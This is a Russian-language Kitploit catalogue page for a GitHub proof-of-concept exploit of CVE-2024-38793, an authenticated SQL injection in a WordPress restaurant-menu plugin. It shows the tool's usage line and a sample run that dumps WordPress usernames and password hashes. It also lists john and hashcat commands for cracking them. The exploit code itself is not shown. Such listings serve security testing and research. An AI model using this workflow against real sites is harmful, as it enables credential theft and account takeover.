Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-38793-PoC — PoC-код для эксплуатации CVE-2024-38793 (Best Restaurant Menu by PriceListo <= 1.4.1 — аутентифицированная SQL-инъекция (Contributor+)) | Kitploit
Инструменты/GitHubGitHub/ret2desync/cve-2024-38793-poc
Взлом паролейАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubret2desync/cve-2024-38793-poc

CVE-2024-38793-PoC

PoC-код для эксплуатации CVE-2024-38793 (Best Restaurant Menu by PriceListo <= 1.4.1 — аутентифицированная SQL-инъекция (Contributor+))

Репозиторий
72 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-38793-PoC

Код доказательства концепции для эксплуатации CVE-2024-38793 (Best Restaurant Menu by PriceListo <= 1.4.1 — аутентифицированная SQL-инъекция (Contributor+)).

Доказательство концепции

Это PoC-эксплойт для уязвимости CVE-2024-38793, SQL-инъекции в версиях плагина WordPress Best Restaurant Menu a.k.a Great Restaurant Menu WP до 1.4.2.

Уязвимость возникает из-за отсутствия санитизации входных данных в аргументе groups при использовании шорткода brm_restaurant_menu.

Примечание: Для эксплуатации требуются учётные данные пользователя с правами не ниже Contributor.

Код попытается получить имена пользователей и хэши паролей из таблицы users в WordPress.

Использование

root@kitploit:~
CVE-2024-38793 Exploit (Best Restaurant Menu by PriceListo Version <= 1.4.1) PoC
         Requires Contributor+ Privileges on a WordPress instance with the plugin installed
         Credit: @ret2desync
         Will attempt to create a new post, exploit the vulnerability and extract all users usernames and password hashes
         Example usage:
         python3 CVE-2024-38793.py -t "http://127.0.0.1/wordpress/" -u contributor -p password --proxy "http://127.0.0.1:8080"
usage: CVE-2024-38793.py [-h] -t TARGET -u USERNAME -p PASSWORD [--proxy PROXY] [-o OUTFILE]

Пример запуска

root@kitploit:~
python3 CVE-2024-38793.py -t "http://127.0.0.1/wordpress/" -u contributor -p password      
CVE-2024-38793 Exploit (Best Restaurant Menu by PriceListo Version <= 1.4.1) PoC
         Requires Contributor+ Privileges on a WordPress instance with the plugin installed
         Credit: @ret2desync
         Will attempt to create a new post, exploit the vulnerability and extract all users usernames and password hashes
         Example usage:
         python3 CVE-2024-38793.py -t "http://127.0.0.1/wordpress/" -u contributor -p password --proxy "http://127.0.0.1:8080"
[*] Successfully signed in to Wordpress using contributor password
[*] Successfully created new post, id: 219
[*] Successfully saved new post with exploit, post id: 219
[*] Successfully grabbed usernames and password hashes
[*] Found 2 sets of credentials
[***                Credentials                ***]
root:$P$BG.b.gHI.byee9PWs8GspKxY9qp0Cm0
contributor:$P$BBVRINbQUo28Tpbp3H7/iITT/Eo9aR0
[*] Crack hashes with: 
 john <hashes_file> --wordlist=<wordlist> 
 hashcat -m 400 -a 0 --username <hashes_file> <wordlist>
[*] Exploit completed successfully
Скачать инструмент